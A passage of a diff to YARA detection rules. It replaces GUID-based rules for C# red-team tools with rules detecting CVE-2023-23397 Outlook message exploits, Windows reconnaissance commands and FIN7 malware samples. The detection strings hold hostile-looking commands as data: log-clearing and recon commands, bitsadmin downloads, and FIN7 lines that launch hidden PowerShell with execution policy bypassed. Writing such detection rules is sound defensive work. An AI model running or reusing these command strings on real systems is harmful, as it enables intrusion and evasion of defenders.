-		$typelibguid0lo = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii wide
+		$ac1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C
+               00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65
+               00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55
+               00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78
+               00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $ac1 and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpo_Remoteaccesspolicies : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Msg_CVE_2023_23397_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "642c2672-2327-5a4a-af91-6e0559996908"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2319-L2332"
+		description = "MSG file with a PidLidReminderFileParameter property, potentially exploiting CVE-2023-23397"
+		author = "delivr.to, modified by Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
+		id = "0a4d7bbe-1e17-5240-ad0f-29511752b267"
+		date = "2023-03-15"
+		modified = "2024-12-03"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L1-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e2e3168f733ce8a3e6129e4f2faa6a90a47f6cfc683c840032c0323170720a1b"
-		score = 75
+		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
+		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
+		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
+		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
+		logic_hash = "fbbbaf5cd858078adddc80b9c9c56cb448613da28206a91778d22cd1cf64655e"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-23397, FILE"
 
 	strings:
-		$typelibguid0lo = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii wide
+		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$rfp = { 1F 85 00 00 }
+		$u1 = { 00 00 5C 00 5C 00 }
+		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
+		$fp_asd = "theme/theme1.xml"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0xD0CF11E0 and uint32be( 4 ) == 0xA1B11AE1 and 1 of ( $psetid* ) and $rfp and $u1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Absinthe : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 : CVE_2023_23397 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8f25593b-b9d2-5807-b299-b039ecfd43a5"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/cameronhotchkies/Absinthe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2334-L2347"
+		description = "Detects suspicious .msg file with a PidLidReminderFileParameter property exploiting CVE-2023-23397 (modified delivr.to rule - more specific = less FPs but limited to exfil using IP addresses, not FQDNs)"
+		author = "delivr.to, Florian Roth, Nils Kuhnert, Arnim Rupp, marcin@ulikowski.pl"
+		id = "d85bf1d9-aebe-5f8c-9dd4-c509f64e221a"
+		date = "2023-03-15"
+		modified = "2023-03-18"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L41-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "54040db5bdcfc711a26401d082693471c3f98fc043a550d1253f72a2d2611ae4"
+		hash = "47fee24586cd2858cfff2dd7a4e76dc95eb44c8506791ccc2d59c837786eafe3"
+		hash = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash = "6c0087a5cbccb3c776a471774d1df10fe46b0f0eb11db6a32774eb716e1b7909"
+		hash = "7fb7a2394e03cc4a9186237428a87b16f6bf1b66f2724aea1ec6a56904e5bfad"
+		hash = "eedae202980c05697a21a5c995d43e1905c4b25f8ca2fff0c34036bc4fd321fa"
+		hash = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
+		logic_hash = "a8e8326f5aaa29b449f9203623e03d3d3a1d176bb764171d860afc510a1732e6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-23397, FILE"
 
 	strings:
-		$typelibguid0lo = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii wide
+		$psetid_app = { 02 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
+		$psetid_meeting = { 90 DA D8 6E 0B 45 1B 10 98 DA 00 AA 00 3F 13 05 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$rfp = { 1F 85 00 00 }
+		$u1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 3? 00 3? 00|3? 00 3? 00|3? 00) }
+		$u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
+		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0xCFD0 and 1 of ( $psetid* ) or uint32be( 0 ) == 0x789F3E22 ) and any of ( $u* ) and $rfp and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Exploitremotingservice : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 : CVE_2023_23397
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2f0b9635-2b2e-5825-baeb-69d7ae3791b1"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/tyranid/ExploitRemotingService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2349-L2364"
+		description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
+		author = "Nils Kuhnert"
+		id = "922fae73-520d-5659-8331-f242c7c55810"
+		date = "2023-03-17"
+		modified = "2023-03-24"
+		reference = "https://twitter.com/wdormann/status/1636491612686622723"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_outlook_cve_2023_23397.yar#L83-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b22513722be15f582d06c23fb6db53722c0edf2f89f17e28ca067f431ffd4616"
-		score = 75
+		logic_hash = "a361eb3abf98655f43efff2a5399f112d9ac2d23df85a642ab744c78e98330e0"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-23397"
 
 	strings:
-		$typelibguid0lo = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii wide
-		$typelibguid1lo = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii wide
-		$typelibguid2lo = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii wide
+		$mail1 = { 0A 46 72 6F 6D 3A 20 }
+		$mail2 = { 0A 54 6F 3A }
+		$mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
+		$tnef1 = "Content-Type: application/ms-tnef" ascii
+		$tnef2 = "\x78\x9f\x3e\x22" base64
+		$ipm1 = "IPM.Task" base64
+		$ipm2 = "IPM.Appointment" base64
+		$unc = "\x00\x00\x00\x5c\x5c" base64
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of ( $mail* ) and all of ( $tnef* ) and 1 of ( $ipm* ) and $unc
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Xploit : FILE
+rule SIGNATURE_BASE_Recon_Commands_Windows_Gen1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "11ba6c14-06b6-5d9f-ac69-08ae506877e7"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/shargon/Xploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2366-L2389"
+		description = "Detects a set of reconnaissance commands on Windows systems"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bc95265c-780d-5451-bd12-d14495877e46"
+		date = "2017-07-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/MSJCxP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_recon_indicators.yar#L12-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b622acce9ff8186266c69d4ca097902027f5ca652408bfa4ec36fa145e14737"
-		score = 75
+		logic_hash = "36beb09c428949140cb007c1022c385c9a1ae4eea8c1f1a419f96b36b8030c7c"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii wide
-		$typelibguid1lo = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii wide
-		$typelibguid2lo = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii wide
-		$typelibguid3lo = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii wide
-		$typelibguid4lo = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii wide
-		$typelibguid5lo = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii wide
-		$typelibguid6lo = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii wide
-		$typelibguid7lo = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii wide
-		$typelibguid8lo = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii wide
-		$typelibguid9lo = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii wide
-		$typelibguid10lo = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii wide
+		$s1 = "netstat -an" ascii
+		$s2 = "net view" ascii fullword
+		$s3 = "net user" ascii fullword
+		$s4 = "whoami" ascii
+		$s5 = "tasklist /v" ascii
+		$s6 = "systeminfo" ascii
+		$s7 = "net localgroup administrators" ascii
+		$s8 = "net user administrator" ascii
+		$s9 = "regedit -e " ascii
+		$s10 = "tasklist /svc" ascii
+		$s11 = "regsvr32 /s /u " ascii
+		$s12 = "CreateObject(\"WScript.Shell\").RegWrite" ascii
+		$s13 = "bitsadmin /rawreturn /transfer getfile" ascii
+		$s14 = "wmic qfe list full" ascii
+		$s15 = "schtasks.exe /create " ascii nocase
+		$s16 = "wmic share get" ascii
+		$s17 = "wmic nteventlog get" ascii
+		$s18 = "wevtutil cl " ascii
+		$s19 = "sc query type= service" ascii
+		$s20 = "arp -a " ascii
+		$fp1 = "avdapp.dll" fullword wide
+		$fp2 = "keyword.command.batchfile" ascii
+		$fp3 = ".sublime-settings" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1000KB and 4 of them and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poc : FILE
+rule SIGNATURE_BASE_SUSP_Recon_Outputs_Jun20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5669bc1a-b32e-5ae7-bf94-8ed2a124c765"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/thezdi/PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2391-L2404"
+		description = "Detects outputs of many different commands often used for reconnaissance purposes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec3759aa-212f-52ce-9f38-636accd35749"
+		date = "2020-06-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_recon_indicators.yar#L52-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f3001a60ce4b6415de2cb035ab56023cd2ee5f4c73e745d87409e5fef1fc9e8a"
-		score = 75
+		logic_hash = "652b28bfb45a11eaaee198c76560c1f55edc5b32c5394e606bb5426551260f24"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "89f9d411-e273-41bb-8711-209fd251ca88" ascii wide
+		$s1 = ". . . . : Yes" ascii
+		$s2 = "with 32 bytes of data:" ascii
+		$s3 = "ff-ff-ff-ff-ff-ff     static" ascii
+		$s4 = "  TCP    0.0.0.0:445" ascii
+		$s5 = "System Idle Process" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 150KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpoabuse : FILE
+rule SIGNATURE_BASE_APT_FIN7_Strings_Aug18_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea27044f-69be-5db7-8d77-28dafb18c7e5"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FSecureLABS/SharpGPOAbuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2406-L2419"
+		description = "Detects strings from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b940986-e41b-5fbf-9e42-cb0fd550e541"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "683be1b4cee3ba705146f62cdc36c99ce5e4711cd38aec8103584321afd934f1"
+		logic_hash = "89d2f8f28a7ab0e78c53d8c41b45efa60cfa9ff72306c49197f52342d9a3c546"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
 
 	strings:
-		$typelibguid0lo = "4f495784-b443-4838-9fa6-9149293af785" ascii wide
+		$s1 = "&&call %a01%%a02% /e:jscript" ascii
+		$s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
+		$s3 = " w=wsc@ript /b " ascii
+		$s4 = "@echo %w:@=%|cmd" ascii
+		$s5 = " & wscript //b /e:jscript"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Watson : FILE
+rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6dc7bb08-0b34-50a0-8ae8-02d96d66a334"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/Watson"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2421-L2434"
+		description = "Detects FIN7 malware sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "885eebfe-2587-5744-ba0c-c74ced946050"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L32-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0fa1d96e9c9fdd612f092dbdcde980956cf4bf24b384991d77737af43637bb34"
+		logic_hash = "a46492383db5af8f60984b42c53a792632f836f1668fca2d564e0f1f1ed313f2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
 
 	strings:
-		$typelibguid0lo = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii wide
+		$x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
+		$x2 = "/*|*| *  Copyright 2016 Microsoft, Industries.|*| *  All rights reserved.|*|" ascii
+		$x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
+		$x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
+		$x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0xcfd0 and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Standin : FILE
+rule SIGNATURE_BASE_APT_FIN7_Maldoc_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2af3c28a-ce5d-5dea-9abe-ff54b180049e"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FuzzySecurity/StandIn"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2436-L2449"
+		description = "Detects malicious Doc from FIN7 campaign"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f3c430e0-be9a-5c3f-9378-a20ef0492afb"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L51-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db008e841cef47916e06167661b3825d1272357a347f522ccea25cc887438480"
+		logic_hash = "f3ecf77a5f909361f4a6af5ca0f25ec85721570587500a8ce2ef203158472e47"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
 
 	strings:
-		$typelibguid0lo = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii wide
+		$s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click  \"Enable editing\" from the yellow bar above" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Azure_Password_Harvesting : FILE
+rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "681cf9da-d664-5402-b7ac-eb2cfad85da9"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/guardicore/azure_password_harvesting"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2451-L2464"
+		description = "Detects FIN7 samples mentioned in FireEye report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0fdd98e8-7536-5159-8085-da7388e5fff2"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L66-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eac946e4110f9e7fdcc69ca562ed37a5e77216a325ccd11e29ec7348c2dd12d4"
+		logic_hash = "5ff078f8cb93a841b68521cfbc120b18952c7ff5b56ab2f3b0eebf63a10aa572"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1e95ac1bb684186e9fb5c67f75c7c26ddc8b18ebfdaf061742ddf1675e17d55"
+		hash2 = "dc645aae5d283fa175cf463a19615ed4d16b1d5238686245574d8a6a8b0fc8fa"
+		hash3 = "eebbce171dab636c5ac0bf0fd14da0e216758b19c0ce2e5c572d7e6642d36d3d"
 
 	strings:
-		$typelibguid0lo = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii wide
+		$s1 = "\\par var console=\\{\\};console.log=function()\\{\\};" ascii
+		$s2 = "616e64792d7063" ascii
+		$x1 = "0043003a005c00550073006500720073005c0061006e00640079005c004400650073006b0074006f0070005c0075006e00700072006f0074006500630074" ascii
+		$x2 = "780065006300750074006500280022004f006e0020004500720072006f007200200052006500730075006d00650020004e006500780074003a0073006500" ascii
+		$x3 = "\\par \\tab \\tab \\tab sh.Run \"powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File \" & pToPSCb, 0, False" fullword ascii
+		$x4 = "002e006c006e006b002d00000043003a005c00550073006500720073005c007400650073007400610064006d0069006e002e0054004500530054005c0044" ascii
+		$x5 = "005c00550073006500720073005c005400450053005400410044007e0031002e005400450053005c0041007000700044006100740061005c004c006f0063" ascii
+		$x6 = "6c00690063006100740069006f006e002200220029003a00650078006500630075007400650020007700700072006f0074006500630074002e0041006300" ascii
+		$x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii
+		$x8 = "\\par \\tab \\tab sh.Run \"%comspec% /c tasklist >\"\"\" & tpath & \"\"\" 2>&1\", 0, true" fullword ascii
+		$x9 = "00720079007b006500760061006c0028002700770061006c006c003d004700650074004f0062006a0065006300740028005c005c0027005c005c00270027" ascii
+		$x10 = "006e00640079005c004400650073006b0074006f0070005c0075006e006c006f0063006b002e0064006f0063002e006c006e006b" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5c7b and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Powerops : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3ef9f099-13c9-5b6f-8615-232240530078"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/fdiskyou/PowerOPS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2466-L2479"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "46c82d27-5683-5acd-9a3c-d69613091ecc"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L95-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7afb5a5c5eaaba574f31d2041ec2e23f969508bac76aeb58a98714b06b8e6ae7"
+		logic_hash = "7144d4c7651e3fb288ef608fdff07af6cb223c90c34fb780d65184760386d5c7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
 
 	strings:
-		$typelibguid0lo = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii wide
+		$s1 = "Manche Enterprises Limited0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Random_Csharptools : FILE
+rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ad8b5573-ad20-50cd-927b-a6401b10e653"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/xorrior/Random-CSharpTools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2481-L2500"
+		description = "Detects sample from FIN7 report in August 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4522cd85-ba85-5afd-8600-1ebabfaf6d02"
+		date = "2018-08-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L110-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
